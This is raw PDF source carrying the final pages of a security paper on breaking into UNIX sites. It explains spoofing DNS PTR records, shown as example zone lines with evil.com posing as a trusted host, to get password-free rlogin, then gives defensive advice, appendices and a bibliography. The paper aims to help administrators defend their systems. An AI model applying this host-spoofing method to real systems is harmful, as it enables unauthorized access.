(arbitrarily limit the discussion to clients in disguise. )Tj
0 -2.55714 TD
(There are many ways that a host can trust: .rhosts and hosts.equiv files\
that allow access without )Tj
0 -1.2 TD
(password verification; window servers that allow remote systems to use a\
nd abuse privileges; export )Tj
T*
(files that control access via NFS, and more. )Tj
0 -2.55714 TD
(Nearly all of these rely on client IP address to hostname conversion to \
determine whether or not service )Tj
0 -1.2 TD
(is to be granted. The simplest method uses the /etc/hosts file for a dir\
ect lookup. However, today most )Tj
T*
(hosts use either DNS \(the Domain Name Service\), NIS, or both for name \
lookup service. A reverse )Tj
T*
(lookup occurs when a server has an IP address \(from a client host conne\
cting to it\) and wishes to get the )Tj
T*
(corresponding client hostname. )Tj
0 -2.55714 TD
(Although the concept of how host trust works is well understood by most \
system administrators, the )Tj
0 -1.2 TD
(_dangers_ of trust, and the _practical_ problem it represents, irrespect\
ive of hostname impersonation, is )Tj
T*
(one of the least understood problems we know of on the Internet. This go\
es far beyond the obvious hosts.)Tj
T*
(equiv and rhosts files; NFS, NIS, windowing systems -- indeed, much of t\
he useful services in UNIX are )Tj
T*
(based on the concept that well known \(to an administrator or user\) sit\
es are trusted in some way. What is )Tj
T*
(not understood is how networking so tightly binds security between what \
are normally considered )Tj
T*
(disjoint hosts. )Tj
0 -2.55714 TD
(Any form of trust can be spoofed, fooled, or subverted, especially when \
the authority that gets queried to )Tj
0 -1.2 TD
(check the credentials of the client is either outside of the server's ad\
ministrative domain, or when the )Tj
T*
(trust mechanism is based on something that has a weak form of authentica\
tion; both are usually the case. )Tj
0 -2.55714 TD
(Obviously, if the host containing the database \(either NIS, DNS, or wha\
tever\) has been compromised, )Tj
0 -1.2 TD
(the intruder can convince the target host that s/he is coming from any t\
rusted host; it is now sufficient to )Tj
T*
(find out which hosts are trusted by the target. This task is often great\
ly helped by examining where )Tj
T*
(system administrators and system accounts \(such as root, etc.\) last lo\
gged in from. Going back to our )Tj
T*
(target, victim.com, you note that root and some other system accounts lo\
gged in from big.victim.com. )Tj
T*
(You change the PTR record for evil.com so that when you attempt to rlogi\
n in from evil.com to victim.)Tj
T*
(com, victim.com will attempt to look up your hostname and will find what\
you placed in the record. If )Tj
T*
(the record in the DNS database looks like: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( 1.192.192.192.in-addr.arpa IN PTR evil.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(And you change it to: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( 1.192.192.192.in-addr.arpa IN PTR big.victim.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(then, depending on how naive victim.com's system software is, victim.com\
will believe the login comes )Tj
0 -1.2 TD
(from big.victim.com, and, assuming that big.victim.com is in the /etc/ho\
sts.equiv or /.rhosts files, you )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(16 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
157 0 obj 4886
endobj
158 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(will be able to login without supplying a password. With NIS, it is a si\
mple matter of either editing the )Tj
0 -1.2 TD
(host database on the NIS master \(if this is controlled by the intruder\)\
or of spoofing or forcing NIS \(see )Tj
T*
(discussion on NIS security above\) to supply the target with whatever in\
formation you desire. Although )Tj
T*
(more complex, interesting, and damaging attacks can be mounted via DNS, \
time and space don't allow )Tj
T*
(coverage of these methods here. )Tj
0 -2.55714 TD
(Two methods can be used to prevent such attacks. The first is the most d\
irect, but perhaps the most )Tj
0 -1.2 TD
(impractical. If your site doesn't use any trust, you won't be as vulnera\
ble to host spoofing. The other )Tj
T*
(strategy is to use cryptographic protocols. Using the secure RPC protoco\
l \(used in secure NFS, NIS+, )Tj
T*
(etc.\) is one method; although it has been "broken" cryptographically, i\
t still provides better assurance )Tj
T*
(than RPC authentication schemes that do not use any form of encryption. \
Other solutions, both hardware )Tj
T*
(\(smartcards\) and software \(Kerberos\), are being developed, but they \
are either incomplete or require )Tj
T*
(changes to system software. )Tj
0 -2.55714 TD
(Appendix B details the results of an informal survey taken from a variet\
y of hosts on the Internet. )Tj
/T1_1 1 Tf
19.38461 0 0 19.38461 10 473.61487 Tm
(Protecting the system)Tj
/T1_0 1 Tf
14 0 0 14 10 436.314 Tm
(It is our hope that we have demonstrated that even some of the most seem\
ingly innocuous services run )Tj
0 -1.2 TD
(can offer \(sometimes unexpectedly\) ammunition to determined system cra\
ckers. But, of course, if )Tj
T*
(security were all that mattered, computers would never be turned on, let\
alone hooked into a network )Tj
T*
(with literally millions of potential intruders. Rather than reiterating \
specific advice on what to switch on )Tj
T*
(or off, we instead offer some general suggestions: )Tj
/T1_2 1 Tf
7 0 0 7 35.713 333.314 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 333.314 Tm
(If you cannot turn off the finger service, consider installing a modifie\
d finger daemon. It is rarely )Tj
T*
(necessary to reveal a user's home directory and the source of last login\
. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 299.71402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 299.71402 Tm
(Don't run NIS unless it's absolutely necessary. Use NFS as little as pos\
sible. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 282.914 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 282.914 Tm
(Never export NFS filesystems unrestricted to the world. Try to export fi\
le systems read-only )Tj
T*
(where possible. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 249.31401 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 249.31401 Tm
(Fortify and protect servers \(e.g. hosts that provide a service to other\
hosts -- NFS, NIS, DNS, )Tj
T*
(whatever.\) Only allow administrative accounts on these hosts. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 215.71402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 215.71402 Tm
(Examine carefully services offered by inetd and the portmapper. Eliminat\
e any that aren't )Tj
T*
(explicitly needed. Use Wietse Venema's inetd wrappers, if for no other r\
eason than to log the )Tj
T*
(sources of connections to your host. This adds immeasurably to the stand\
ard UNIX auditing )Tj
T*
(features, especially with respect to network attacks. If possible, use t\
he loghost mechanism of )Tj
T*
(syslog to collect security-related information on a secure host. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 131.71402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 131.71402 Tm
(Eliminate trust unless there is an absolute need for it. Trust is your e\
nemy. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 114.91402 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 114.91402 Tm
(Use shadow passwords and a passwd command that disallows poor passwords.\
Disable or delete )Tj
T*
(unused/dormant system or user accounts. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 81.31401 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 81.31401 Tm
(Keep abreast of current literature \(see our suggested reading list and \
bibliography at the end of )Tj
T*
(this paper\) and security tools; communicate to others about security pr\
oblems and incidents. At )Tj
T*
(minimum, subscribe to the CERT mailing list and phrack magazine \(plus t\
he firewalls mailing )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(17 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
159 0 obj 4424
endobj
160 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 50 753.97552 Tm
(list, if your site is using or thinking about installing a firewall\) an\
d read the usenet security )Tj
0 -1.2 TD
(newsgroups to get the latest information on security problems. Ignorance\
is the deadliest security )Tj
T*
(problem we are aware of. )Tj
/T1_1 1 Tf
7 0 0 7 35.713 703.57556 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 703.57556 Tm
(Install all vendor security patches as soon as possible, on all of your \
hosts. Examine security )Tj
T*
(patch information for other vendors - many bugs \(rdist, sendmail\) are \
common to many UNIX )Tj
T*
(variants. )Tj
-2.85715 -2.55714 Td
(It is interesting to note that common solutions to security problems suc\
h as running Kerberos or using )Tj
T*
(one-time passwords or digital tokens are ineffective against most of the\
attacks we discuss here. We )Tj
T*
(heartily recommend the use of such systems, but be aware that they are _\
not_ a total security solution -- )Tj
T*
(they are part of a larger struggle to defend your system. )Tj
/T1_2 1 Tf
19.38461 0 0 19.38461 10 543.01489 Tm
(Conclusions)Tj
/T1_0 1 Tf
14 0 0 14 10 505.71402 Tm
(Perhaps none of the methods shown here are surprising; when writing this\
paper, we didn't learn very )Tj
T*
(much about how to break into systems. What we _did_ learn was, while tes\
ting these methods out on our )Tj
T*
(own systems and that of friendly sites, just how effective this set of m\
ethods is for gaining access to a )Tj
T*
(typical \(UNIX\) Internet host. Tiring of trying to type these in all by\
hand, and desiring to keep our own )Tj
T*
(systems more secure, we decided to implement a security tool \(SATAN\) t\
hat attempts to check remote )Tj
T*
(hosts for at least some of the problems discussed here. The typical resp\
onse, when telling people about )Tj
T*
(our paper and our tool was something on the order of "that sounds pretty\
dangerous -- I hope you're not )Tj
T*
(going to give it out to everybody. But you since you can trust me, may I\
have a copy of it?" )Tj
0 -2.55714 TD
(We never set out to create a cookbook or toolkit of methods and programs\
on how to break into systems )Tj
0 -1.2 TD
(-- instead, we saw that these same methods were being used, every day, a\
gainst ourselves and against )Tj
T*
(friendly system administrators. We believe that by propagating informati\
on that normally wasn't )Tj
T*
(available to those outside of the underworld, we can increase security b\
y raising awareness. Trying to )Tj
T*
(restrict access to "dangerous" security information has never seemed to \
be a very effective method for )Tj
T*
(increasing security; indeed, the opposite appears to be the case, since \
the system crackers have shown )Tj
T*
(little reticence to share their information with each other. )Tj
0 -2.55714 TD
(While it is almost certain that some of the information presented here i\
s new material to \(aspiring\) )Tj
0 -1.2 TD
(system crackers, and that some will use it to gain unauthorized entrance\
onto hosts, the evidence )Tj
T*
(presented even by our ad hoc tests shows that there is a much larger num\
ber of insecure sites, simply )Tj
T*
(because the system administrators don't know any better -- they aren't s\
tupid or slow, they simply are )Tj
T*
(unable to spend the very little free time that they have to explore all \
of the security issues that pertain to )Tj
T*
(their systems. Combine that with no easy access to this sort of informat\
ion and you have poorly )Tj
T*
(defended systems. We \(modestly\) hope that this paper will provide badl\
y-needed data on how systems )Tj
T*
(are broken into, and further, to explain _why_ certain steps should be t\
aken to secure a system. Knowing )Tj
T*
(why something is a problem is, in our opinion, the real key to learning \
and to making an informed, )Tj
T*
(intelligent choice as to what security really means for your site. )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(18 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
161 0 obj 4150
endobj
162 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
0.5 0.5 0.5 rg
10 761.73846 m
10 763.73846 l
602 763.73846 l
601 762.73846 l
11 762.73846 l
11 762.73846 l
h
f
0.875 0.875 0.875 rg
602 763.73846 m
602 761.73846 l
10 761.73846 l
11 762.73846 l
601 762.73846 l
601 762.73846 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 714.03522 Tm
(Appendix A:)Tj
19.38461 0 0 19.38461 10 670.03027 Tm
(SATAN \(Security Analysis Tool for Auditing Networks\))Tj
/T1_0 1 Tf
14 0 0 14 10 632.72937 Tm
(Originally conceived some years ago, SATAN is actually the prototype of \
a much larger and more )Tj
0 -1.2 TD
(comprehensive vision of a security tool. In its current incarnation, SAT\
AN remotely probes and reports )Tj
T*
(various bugs and weaknesses in network services and windowing systems, a\
s well as detailing as much )Tj
T*
(generally useful information as possible about the target\(s\). It then \
processes the data with a crude filter )Tj
T*
(and what might be termed an expert system to generate the final security\
analysis. While not particularly )Tj
T*
(fast, it is extremely modular and easy to modify. )Tj
0 -2.55714 TD
(SATAN consists of several sub-programs, each of which is an executable f\
ile \(perl, shell, compiled C )Tj
0 -1.2 TD
(binary, whatever\) that tests a host for a given potential weakness. Add\
ing further test programs is as )Tj
T*
(simple as putting an executable into the main directory with the extensi\
on ".sat"; the driver program will )Tj
T*
(automatically execute it. The driver generates a set of targets \(using \
DNS and a fast version of ping )Tj
T*
(together to get "live" targets\), and then executes each of the programs\
over each of the targets. A data )Tj
T*
(filtering/interpreting program then analyzes the output, and lastly a re\
porting program digests everything )Tj
T*
(into a more readable format. )Tj
0 -2.55714 TD
(The entire package, including source code and documentation, will be mad\
e freely available to the )Tj
0 -1.2 TD
(public, via anonymous ftp and by posting it to one of the numerous sourc\
e code groups on the Usenet. )Tj
ET
0.5 0.5 0.5 rg
10 326.75385 m
10 328.75385 l
602 328.75385 l
601 327.75385 l
11 327.75385 l
11 327.75385 l
h
f
0.875 0.875 0.875 rg
602 328.75385 m
602 326.75385 l
10 326.75385 l
11 327.75385 l
601 327.75385 l
601 327.75385 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 279.05063 Tm
(Appendix B:)Tj
/T1_0 1 Tf
14 0 0 14 10 240.00632 Tm
(An informal survey conducted on about a dozen Internet sites \(education\
al, military, and commercial, )Tj
T*
(with over 200 hosts and 40000 accounts\) revealed that on the average, c\
lose to 10 percent of a site's )Tj
T*
(accounts had .rhosts files. These files averaged six trusted hosts each;\
however, it was not uncommon to )Tj
T*
(have well over one hundred entries in an account's .rhosts file, and on \
a few occasions, the number was )Tj
T*
(over five hundred! \(This is not a record one should be proud of owning.\
\) In addition, _every_ site )Tj
T*
(directly on the internet \(one site was mostly behind a firewall\) trust\
ed a user or host at another site -- )Tj
T*
(thus, the security of the site was not under the system administrators d\
irect control. The larger sites, with )Tj
T*
(more users and hosts, had a lower percentage of users with .rhosts files\
, but the size of .rhosts files )Tj
T*
(increased, as well as the number of trusted off-site hosts. )Tj
0 -2.55714 TD
(Although it was very difficult to verify how many of the entries were va\
lid, with such hostnames such as )Tj
0 -1.2 TD
("Makefile", "Message-Id:", and "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as q\
uite a few wildcard )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(19 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
163 0 obj 4160
endobj
164 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(entries, we question the wisdom of putting a site's security in the hand\
s of its users. Many users )Tj
0 -1.2 TD
(\(especially the ones with larger .rhosts files\) attempted to put shell\
-style comments in their .rhosts files, )Tj
T*
(which most UNIX systems attempt to resolve as valid host names. Unfortun\
ately, an attacker can then )Tj
T*
(use the DNS and NIS hostname spoofing techniques discussed earlier to se\
t their hostname to "#" and )Tj
T*
(freely log in. This puts a great many sites at risk \(at least one major\
vendor ships their systems with )Tj
T*
(comments in their /etc/hosts.equiv files.\) )Tj
0 -2.55714 TD
(You might think that these sites were not typical, and, as a matter of f\
act, they weren't. Virtually all of )Tj
0 -1.2 TD
(the administrators knew a great deal about security and write security p\
rograms for a hobby or )Tj
T*
(profession, and many of the sites that they worked for did either securi\
ty research or created security )Tj
T*
(products. We can only guess at what a "typical" site might look like. )Tj
ET
0.5 0.5 0.5 rg
10 551 m
10 553 l
602 553 l
601 552 l
11 552 l
11 552 l
h
f
0.875 0.875 0.875 rg
602 553 m
602 551 l
10 551 l
11 552 l
601 552 l
601 552 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 503.29678 Tm
(Appendix C:)Tj
/T1_0 1 Tf
14 0 0 14 10 464.25247 Tm
(After receiving mail from a site that had been broken into from one of o\
ur systems, an investigation was )Tj
T*
(started. In time, we found that the intruder was working from a list of \
".com" \(commercial\) sites, looking )Tj
T*
(for hosts with easy-to steal password files. In this case, "easy-to-stea\
l" referred to sites with a guessable )Tj
T*
(NIS domainname and an accessible NIS server. Not knowing how far the int\
ruder had gotten, it looked )Tj
T*
(like a good idea to warn the sites that were in fact vulnerable to passw\
ord file theft. Of the 656 hosts in )Tj
T*
(the intruder's hit list, 24 had easy-to-steal password files -- about on\
e in twenty-five hosts! One third of )Tj
T*
(these files contained at least one password-less account with an interac\
tive shell. With a grand total of )Tj
T*
(1594 password-file entries, a ten-minute run of a publically-available p\
assword cracker \(Crack\) revealed )Tj
T*
(more than 50 passwords, using nothing but a low-end Sun workstation. Ano\
ther 40 passwords were )Tj
T*
(found within the next 20 minutes; and a root password was found in just \
over an hour. The result after a )Tj
T*
(few days of cracking: five root passwords found, 19 out of 24 password f\
iles \(eighty percent\) with at )Tj
T*
(least one known password, and 259 of 1594 \(one in six\) passwords guess\
ed. )Tj
ET
0.5 0.5 0.5 rg
10 246.67693 m
10 248.67693 l
602 248.67693 l
601 247.67693 l
11 247.67693 l
11 247.67693 l
h
f
0.875 0.875 0.875 rg
602 248.67693 m
602 246.67693 l
10 246.67693 l
11 247.67693 l
601 247.67693 l
601 247.67693 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
24.76923 0 0 24.76923 10 198.97371 Tm
(Appendix D:)Tj
19.38461 0 0 19.38461 10 154.96872 Tm
(How to get some free security resources on the Internet)Tj
16.15384 0 0 16.15384 10 115.53804 Tm
(Mailing lists:)Tj
/T1_2 1 Tf
7 0 0 7 35.713 79.28325 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 79.28325 Tm
(The CERT \(Computer Emergency Response Team\) advisory mailing list. Sen\
d e-mail to )Tj
T*
(cert@cert.org, and ask to be placed on their mailing list. )Tj
/T1_2 1 Tf
7 0 0 7 35.713 45.68324 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 45.68324 Tm
(The Phrack newsletter. Send an e-mail message to phrack@well.sf.ca.us an\
d ask to be added to )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(20 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
165 0 obj 3932
endobj
166 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 50 753.97552 Tm
(the list. )Tj
/T1_1 1 Tf
7 0 0 7 35.713 737.17554 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 737.17554 Tm
(The Firewalls mailing list. Send the following line to majordomo@greatci\
rcle.com: )Tj
/T1_2 1 Tf
0 -2.56197 TD
( subscribe firewalls)Tj
/T1_1 1 Tf
7 0 0 7 35.713 665.57556 Tm
(l)Tj
/T1_0 1 Tf
( )Tj
14 0 0 14 50 665.57556 Tm
(Computer Underground Digest. Send e-mail to tk0jut2@mvs.cso.niu.edu, ask\
ing to be placed on )Tj
0 -1.2 TD
(the list. )Tj
/T1_3 1 Tf
16.15384 0 0 16.15384 10 610.8457 Tm
(Free Software:)Tj
/T1_0 1 Tf
14 0 0 14 10 574.59094 Tm
(COPS \(Computer Oracle and Password System\) is available via anonymous \
ftp from )Tj
ET
0 0 1 RG
0.7056 w 10 M 0 j 0 J []0 d
489.06598 572.47412 m
595.242 572.47412 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 489.06598 574.59094 Tm
(ftp://ftp.win.tue.nl/)Tj
ET
10 553.67413 m
83.108 553.67413 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 555.79095 Tm
(pub/security/)Tj
0 0 0 rg
(. )Tj
0 -2.7 TD
(The latest version of berkeley sendmail is available via anonymous ftp f\
rom )Tj
ET
439.26801 515.87415 m
600.63202 515.87415 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 439.26801 517.99091 Tm
(ftp://ftp.cs.berkeley.edu/ucb/)Tj
ET
10 497.07413 m
64.44601 497.07413 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 499.19092 Tm
(sendmail/)Tj
0 0 0 rg
(. )Tj
T*
(Sources for ftpd and many other network utilities can be found in )Tj
ET
379.38998 459.27414 m
589.362 459.27414 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 379.38998 461.39093 Tm
(ftp://ftp.uu.net/packages/bsd-sources/)Tj
0 0 0 rg
(. )Tj
-26.38499 -2.7 Td
(Source for ISS \(Internet Security Scanner\), a tool that remotely scans\
for various network )Tj
0 -1.2 TD
(vulnerabilities, is available via anonymous ftp from )Tj
ET
302.418 404.67413 m
597.18805 404.67413 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 302.418 406.79092 Tm
(ftp://ftp.uu.net/usenet/comp.sources.misc/volume40/)Tj
ET
10 385.87415 m
28.67599 385.87415 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 387.99094 Tm
(iss/)Tj
0 0 0 rg
(. )Tj
0 -2.7 TD
(Securelib is available via anonymous ftp from )Tj
ET
271.68802 348.07413 m
566.45795 348.07413 l
S
0 0 1 rg
BT
/T1_0 1 Tf
14 0 0 14 271.68802 350.19092 Tm
(ftp://ftp.uu.net/usenet/comp.sources.misc/volume36/)Tj
ET
10 329.27414 m
64.43201 329.27414 l
S
BT
/T1_0 1 Tf
14 0 0 14 10 331.39093 Tm
(securelib/)Tj
0 0 0 rg
(. )Tj
ET
0.5 0.5 0.5 rg
10 296.61539 m
10 298.61539 l
602 298.61539 l
601 297.61539 l
11 297.61539 l
11 297.61539 l
h
f
0.875 0.875 0.875 rg
602 298.61539 m
602 296.61539 l
10 296.61539 l
11 297.61539 l
601 297.61539 l
601 297.61539 l
h
f
0 0 0 rg
BT
/T1_3 1 Tf
19.38461 0 0 19.38461 10 253.63025 Tm
(Bibliography:)Tj
/T1_4 1 Tf
14 0 0 14 10 216.32941 Tm
(Baldwin, Robert W.)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(Rule Based Analysis of Computer Security)Tj
/T1_0 1 Tf
(, Massachusetts Institute of )Tj
0 -1.2 TD
(Technology, June 1987. )Tj
/T1_4 1 Tf
0 -2.55714 TD
(Bellovin, Steve)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(Using the Domain Name System for System Break-ins)Tj
/T1_0 1 Tf
(, 1992 \(unpublished\). )Tj
/T1_4 1 Tf
T*
(Massachusetts Institute of Technology)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(X Window System Protocol)Tj
/T1_0 1 Tf
(, Version 11, 1990. )Tj
/T1_4 1 Tf
T*
(Shimomura, Tsutomu)Tj
/T1_0 1 Tf
(, private communication. )Tj
/T1_4 1 Tf
T*
(Sun Microsystems)Tj
/T1_0 1 Tf
(, )Tj
/T1_5 1 Tf
(OpenWindows V3.0.1 User Commands)Tj
/T1_0 1 Tf
(, March 1992. )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(21 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
167 0 obj(Improving the Security of Your Site by Breaking Into it)
endobj
168 0 obj<>
endobj
169 0 obj<>
endobj
170 0 obj<>
endobj
171 0 obj<>
endobj
172 0 obj[169 0 R]
endobj
173 0 obj(http://www.deter.com/unix/papers/improve_by_breakin.html)
endobj
174 0 obj(ˆ†‹îšnQ×QèhFêÒ4)
endobj
175 0 obj<>
endobj
176 0 obj<>
endobj
177 0 obj(;’?Ý‚+Ý[qòìžÁw…)
endobj
178 0 obj<>
endobj
179 0 obj<>
endobj
180 0 obj<>
endobj
181 0 obj<>
endobj
182 0 obj<>
endobj
183 0 obj<>stream
Improving the Security of Your Site by Breaking Into it
endstream
endobj
xref
0 184
0000000004 65535 f
0000000016 00000 n
0000000146 00000 n
0000000219 00000 n
0000000038 00001 f
0000000400 00000 n
0000000420 00000 n
0000000488 00000 n
0000000589 00000 n
0000000633 00000 n
0000000680 00000 n
0000001373 00000 n
0000001582 00000 n
0000001818 00000 n
0000001842 00000 n
0000002039 00000 n
0000002063 00000 n
0000002248 00000 n
0000002272 00000 n
0000002481 00000 n
0000002505 00000 n
0000002702 00000 n
0000002726 00000 n
0000002935 00000 n
0000002959 00000 n
0000003156 00000 n
0000003180 00000 n
0000003377 00000 n
0000003401 00000 n
0000003598 00000 n
0000003622 00000 n
0000003819 00000 n
0000003843 00000 n
0000004041 00000 n
0000004134 00000 n
0000004227 00000 n
0000004320 00000 n
0000004406 00000 n
0000000039 00001 f
0000000042 00001 f
0000004496 00000 n
0000004520 00000 n
0000000043 00001 f
0000000046 00001 f
0000004718 00000 n
0000004742 00000 n
0000000047 00001 f
0000000050 00001 f
0000004940 00000 n
0000004964 00000 n
0000000051 00001 f
0000000054 00001 f
0000005162 00000 n
0000005186 00000 n
0000000055 00001 f
0000000060 00001 f
0000005396 00000 n
0000005420 00000 n
0000005618 00000 n
0000005711 00000 n
0000000061 00001 f
0000000064 00001 f
0000005777 00000 n
0000005801 00000 n
0000000065 00001 f
0000000068 00001 f
0000006011 00000 n
0000006035 00000 n
0000000069 00001 f
0000000072 00001 f
0000006245 00000 n
0000006269 00000 n
0000000073 00001 f
0000000076 00001 f
0000006467 00000 n
0000006491 00000 n
0000000077 00001 f
0000000081 00001 f
0000006701 00000 n
0000006725 00000 n
0000006987 00000 n
0000000082 00001 f
0000000095 00001 f
0000007094 00000 n
0000007118 00000 n
0000007424 00000 n
0000007504 00000 n
0000007803 00000 n
0000007984 00000 n
0000008158 00000 n
0000008335 00000 n
0000008532 00000 n
0000008722 00000 n
0000008925 00000 n
0000009121 00000 n
0000000096 00001 f
0000000098 00001 f
0000009345 00000 n
0000000099 00001 f
0000000100 00001 f
0000000101 00001 f
0000000102 00001 f
0000000103 00001 f
0000000104 00001 f
0000000105 00001 f
0000000106 00001 f
0000000107 00001 f
0000000108 00001 f
0000000109 00001 f
0000000110 00001 f
0000000111 00001 f
0000000112 00001 f
0000000113 00001 f
0000000116 00001 f
0000009369 00000 n
0000009459 00000 n
0000000117 00001 f
0000000000 00001 f
0000009551 00000 n
0000009679 00000 n
0000009705 00000 n
0000010246 00000 n
0000010313 00000 n
0000010501 00000 n
0000010523 00000 n
0000014284 00000 n
0000014306 00000 n
0000018757 00000 n
0000018779 00000 n
0000023228 00000 n
0000023250 00000 n
0000026721 00000 n
0000026743 00000 n
0000029749 00000 n
0000029771 00000 n
0000032784 00000 n
0000032806 00000 n
0000036478 00000 n
0000036500 00000 n
0000039471 00000 n
0000039493 00000 n
0000043286 00000 n
0000043308 00000 n
0000047203 00000 n
0000047225 00000 n
0000050787 00000 n
0000050809 00000 n
0000054320 00000 n
0000054342 00000 n
0000056622 00000 n
0000056644 00000 n
0000060084 00000 n
0000060106 00000 n
0000063382 00000 n
0000063404 00000 n
0000066449 00000 n
0000066471 00000 n
0000070513 00000 n
0000070535 00000 n
0000075476 00000 n
0000075498 00000 n
0000079977 00000 n
0000079999 00000 n
0000084204 00000 n
0000084226 00000 n
0000088441 00000 n
0000088463 00000 n
0000092450 00000 n
0000092524 00000 n
0000092562 00000 n
0000092655 00000 n
0000092686 00000 n
0000092796 00000 n
0000092822 00000 n
0000092897 00000 n
0000092932 00000 n
0000093195 00000 n
0000093248 00000 n
0000093283 00000 n
0000093329 00000 n
0000093373 00000 n
0000093417 00000 n
0000093503 00000 n
0000093640 00000 n
trailer
<]>>
startxref
96995
%%EOF